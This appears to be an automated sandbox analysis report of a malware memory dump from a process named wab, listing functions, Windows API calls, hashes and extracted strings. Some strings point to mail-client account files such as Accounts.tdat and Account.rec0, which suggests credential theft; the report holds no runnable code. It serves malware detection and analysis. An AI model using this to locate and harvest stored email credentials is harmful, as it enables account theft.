                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3594823470-0
                                                                                                                                                                                                                          • Opcode ID: cf03cdc443554260c4ce1a888444c1156e45c3b5b19bc60df4ca5a4fe288afb5
                                                                                                                                                                                                                          • Instruction ID: 911ab9c64bb03605bfea8bd2fe854dd4ce39c552faac61f3d250d578fa3bf5f7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf03cdc443554260c4ce1a888444c1156e45c3b5b19bc60df4ca5a4fe288afb5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34217F79D00328ABCF20DEA5DC48EDF3779EF44258F104296E859971A1DA309AA6CB40
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 33E11E89: lstrlenW.KERNEL32(?,?,?,?,?,33E110DF,?,?,?,00000000), ref: 33E11E9A
                                                                                                                                                                                                                            • Part of subcall function 33E11E89: lstrcatW.KERNEL32(?,?), ref: 33E11EAC
                                                                                                                                                                                                                            • Part of subcall function 33E11E89: lstrlenW.KERNEL32(?,?,33E110DF,?,?,?,00000000), ref: 33E11EB3
                                                                                                                                                                                                                            • Part of subcall function 33E11E89: lstrlenW.KERNEL32(?,?,33E110DF,?,?,?,00000000), ref: 33E11EC8
                                                                                                                                                                                                                            • Part of subcall function 33E11E89: lstrcatW.KERNEL32(?,33E110DF), ref: 33E11ED3
                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 33E1122A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                                                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                          • API String ID: 1475205934-1520055953
                                                                                                                                                                                                                          • Opcode ID: fa5b8bedb006b75ef8470e72ec3fb1dd506fed788e7ba8a03b64a1162ee74cf8
                                                                                                                                                                                                                          • Instruction ID: 0192999bb7894230a60fa0d91862c9ab59f1f112af5b4c695d74e93fbe4deadf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa5b8bedb006b75ef8470e72ec3fb1dd506fed788e7ba8a03b64a1162ee74cf8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E21A2BDE20358AAEB2097E0EC81FEE7339EF80714F000556F604EB1D0E6B15E918B59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,33E110DF,?,?,?,00000000), ref: 33E11E9A
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 33E11EAC
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,33E110DF,?,?,?,00000000), ref: 33E11EB3
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,33E110DF,?,?,?,00000000), ref: 33E11EC8
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,33E110DF), ref: 33E11ED3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                                                                          • Opcode ID: d7011b65bcd34aa070467328ef9ead5430c860d440239c68be7a6693e51520e1
                                                                                                                                                                                                                          • Instruction ID: 23da0ff0c80370d5de31ecf051c3c00e3f491b29a544c5e5b275f5d178cac56e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7011b65bcd34aa070467328ef9ead5430c860d440239c68be7a6693e51520e1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12F0892A9002247AD6217B59EC85F7F777DEFC9BA0F440019F608931909B55585393B5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,33E16FFD,00000000,?,?,?,33E18A72,?,?,00000100), ref: 33E1887B
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,33E18A72,?,?,00000100,5EFC4D8B,?,?), ref: 33E18901
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 33E189FB
                                                                                                                                                                                                                            • Part of subcall function 33E156D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 33E15702
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeap
                                                                                                                                                                                                                          • String ID: }p[/
                                                                                                                                                                                                                          • API String ID: 2584219951-3413948691
                                                                                                                                                                                                                          • Opcode ID: adab0ae47deb01969ee9be15efafabab90b8da08cc16b157a195799a209c86e4
                                                                                                                                                                                                                          • Instruction ID: 409e80a33ecf922e5bca03fc599cc3accd15da72b197d8a2a5a10d244f4c7664
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adab0ae47deb01969ee9be15efafabab90b8da08cc16b157a195799a209c86e4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7351E6B2E10316AFEB158F60CC80EAF77BAEB44795F554629FD04E6180EB78DC60C690
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,33E16FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 33E18731
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 33E187BA
                                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 33E187CC
                                                                                                                                                                                                                            • Part of subcall function 33E156D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 33E15702
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType
                                                                                                                                                                                                                          • String ID: }p[/
                                                                                                                                                                                                                          • API String ID: 1699317483-3413948691
                                                                                                                                                                                                                          • Opcode ID: 52c08711c0c15ddd5276ef190380082cc007a3c060f5d45ba886c1f2046046fc
                                                                                                                                                                                                                          • Instruction ID: 1325552e60eb3526debd822aabff24bd2fd00202e9d6e97398d7b0f87a93f3e4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52c08711c0c15ddd5276ef190380082cc007a3c060f5d45ba886c1f2046046fc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5431CF76E1022AABDF149F64CC94EEF7BB5EB44315F040228EC05E7290E739D961CBA0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 33E199A8
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 33E199D6
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 33E19A07
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                          • String ID: }p[/
                                                                                                                                                                                                                          • API String ID: 2456169464-3413948691
                                                                                                                                                                                                                          • Opcode ID: 00331a2b85c832497fed7dfb123cdff462f719de069b19ab25266686bd98413b
                                                                                                                                                                                                                          • Instruction ID: e0abcabc851c1b61d134f4df4640b7ba048fdbd6fdd8bc251d092d46a078237d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00331a2b85c832497fed7dfb123cdff462f719de069b19ab25266686bd98413b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A23161B5A002199FDB14DF69CC91AEAB7B9FF08344F0444ADF50AE7250DA30AD95CFA0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,33E1190E,?,?,00000000,?,00000000), ref: 33E11643
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 33E1165A
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,33E1190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 33E11661
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00001008,?), ref: 33E11686
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcatlstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1475610065-0
                                                                                                                                                                                                                          • Opcode ID: 6eaf6f836edb3250738315f5dd56cc05a00331d8549a0598e322190e36e61900
                                                                                                                                                                                                                          • Instruction ID: ffa644ab83e45f43727e951abce6d37070b7c3d3c0d52b49434ac8a5c6c0eb67
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6eaf6f836edb3250738315f5dd56cc05a00331d8549a0598e322190e36e61900
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F521DA37D00318ABDB04DF94DC81EFE77B9EF88710F14406AE504EB241DB34A55287A5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 33E1715C
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 33E1717F
                                                                                                                                                                                                                            • Part of subcall function 33E156D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 33E15702
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 33E171A5
                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 33E171C7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1794362364-0
                                                                                                                                                                                                                          • Opcode ID: 896de219b9817cbd74887647c279f64f34081f944430e17c75cbf5e3ab3ca449
                                                                                                                                                                                                                          • Instruction ID: 3ccc5c8de7d33bf6f302ae769a00bfd7990d96bfcf5bb642366b29798f431152
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 896de219b9817cbd74887647c279f64f34081f944430e17c75cbf5e3ab3ca449
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D0184B6F153257FA3511AF6CC88D7B6E7EEAC6EA43540129FD04D7240EE608C1292B0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,33E11D66,00000000,00000000,?,33E15C88,33E11D66,00000000,00000000,00000000,?,33E15E85,00000006,FlsSetValue), ref: 33E15D13
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,33E15C88,33E11D66,00000000,00000000,00000000,?,33E15E85,00000006,FlsSetValue,33E1E190,FlsSetValue,00000000,00000364,?,33E15BC8), ref: 33E15D1F
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,33E15C88,33E11D66,00000000,00000000,00000000,?,33E15E85,00000006,FlsSetValue,33E1E190,FlsSetValue,00000000), ref: 33E15D2D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                          • Opcode ID: a1541dc5ace2482df0155bbc3ec6302994f7980b2da295884568f009af302c1a
                                                                                                                                                                                                                          • Instruction ID: 31d86bbfb2a64ca21fa0c15dccefaeba3dc7869bc527e68191b9d4fca97387af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1541dc5ace2482df0155bbc3ec6302994f7980b2da295884568f009af302c1a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E01D876E11332EBD3115E68CC48B5737A9AF057E5B150620F915E72C0D730D412CBD0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: }p[/
                                                                                                                                                                                                                          • API String ID: 0-3413948691
                                                                                                                                                                                                                          • Opcode ID: f22dbaec1abc4d3106d038e2840cf14d41f2e4f5ce43b4d729f806ca7e2390d7
                                                                                                                                                                                                                          • Instruction ID: 3eac3543eefe5fe9afba8bb494405f8390385661e2be7e9c55bad96d6d2ee403
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f22dbaec1abc4d3106d038e2840cf14d41f2e4f5ce43b4d729f806ca7e2390d7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A051A3B5E10309ABEB00DFA4C844FEEBBF8AF46714F080055F846A7690D775A561CBA1
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 33E169F3: GetOEMCP.KERNEL32(00000000,?,?,33E16C7C,?), ref: 33E16A1E
                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,33E16CC1,?,00000000), ref: 33E16E94
                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,33E16CC1,?,?,?,33E16CC1,?,00000000), ref: 33E16EA7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                                                                                                                          • String ID: }p[/
                                                                                                                                                                                                                          • API String ID: 546120528-3413948691
                                                                                                                                                                                                                          • Opcode ID: 46ab368cfe5326b8bc80be142f05d6b76771b80946c20f37d3b1fd14a6f00141
                                                                                                                                                                                                                          • Instruction ID: cde4c048f78a8e8738acf16f0e81a9b586959f457beff65cc62c580eead3ee1a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46ab368cfe5326b8bc80be142f05d6b76771b80946c20f37d3b1fd14a6f00141
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B75123B4E003559FEB208F75C880BAABBF5EF49308F08816ED895AB651D735D156CB90
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 33E16AF0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Info
                                                                                                                                                                                                                          • String ID: $}p[/
                                                                                                                                                                                                                          • API String ID: 1807457897-1339333836
                                                                                                                                                                                                                          • Opcode ID: 1c5902d70089fc2ba341ac9c6db92ca5576fd623242a775d23e98321b1e13daf
                                                                                                                                                                                                                          • Instruction ID: 5a7d94b358117ed7db1aec72a5db4bf27d1e12aa5a9ea8618f4fd01432c5d3fc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c5902d70089fc2ba341ac9c6db92ca5576fd623242a775d23e98321b1e13daf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6341D8B4D0439C9BDB218F24CC84FE6BBB9EB55308F5404EDD9C986142D635A966CF20
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 33E198B1
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 33E198DA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                          • String ID: }p[/
                                                                                                                                                                                                                          • API String ID: 442123175-3413948691
                                                                                                                                                                                                                          • Opcode ID: c33a985a6ed9b6fc47a1f594fde3253ae48c00f276dfa37287c3f7f397d525b3
                                                                                                                                                                                                                          • Instruction ID: 780547a9062710bfc94fa217876c94763c51da64079b75d4b0f8c616fa9c5fbb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c33a985a6ed9b6fc47a1f594fde3253ae48c00f276dfa37287c3f7f397d525b3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56318171E003199FCB24CF69CC80ADAF3F5FF48310B1484AAE54AD7250D770A991CB50
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 33E197C3
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 33E197EC
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                          • String ID: }p[/
                                                                                                                                                                                                                          • API String ID: 442123175-3413948691
                                                                                                                                                                                                                          • Opcode ID: 95ee7c1fbb8a503e2c44379ff514c0994ea2a27c63533209aa0a28654f6079ce
                                                                                                                                                                                                                          • Instruction ID: 185fd4db80edc4d0dda7aa3a3d996d3de7466d7040193ee7dffe19daed9aef25
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95ee7c1fbb8a503e2c44379ff514c0994ea2a27c63533209aa0a28654f6079ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E218076E003199FDB14CF69C880BD9B3F9FF48351F1044AAE546D7251D630A996CB60
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 33E15F8A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: String
                                                                                                                                                                                                                          • String ID: LCMapStringEx$}p[/
                                                                                                                                                                                                                          • API String ID: 2568140703-1093622780
                                                                                                                                                                                                                          • Opcode ID: 3f8cdd97416096d437f1b9968c2de292bb5dc50861ad05da4ac832941e469193
                                                                                                                                                                                                                          • Instruction ID: ca1a1b786a0f445cd515211d725dc8e3cb9c765968eb919bd01defd347a9222c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f8cdd97416096d437f1b9968c2de292bb5dc50861ad05da4ac832941e469193
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8601D732901219BBCF165F90CC00EAE7F66EF4C350F454154FA1465161CB329971AB95
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 33E15F02
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountCriticalInitializeSectionSpin
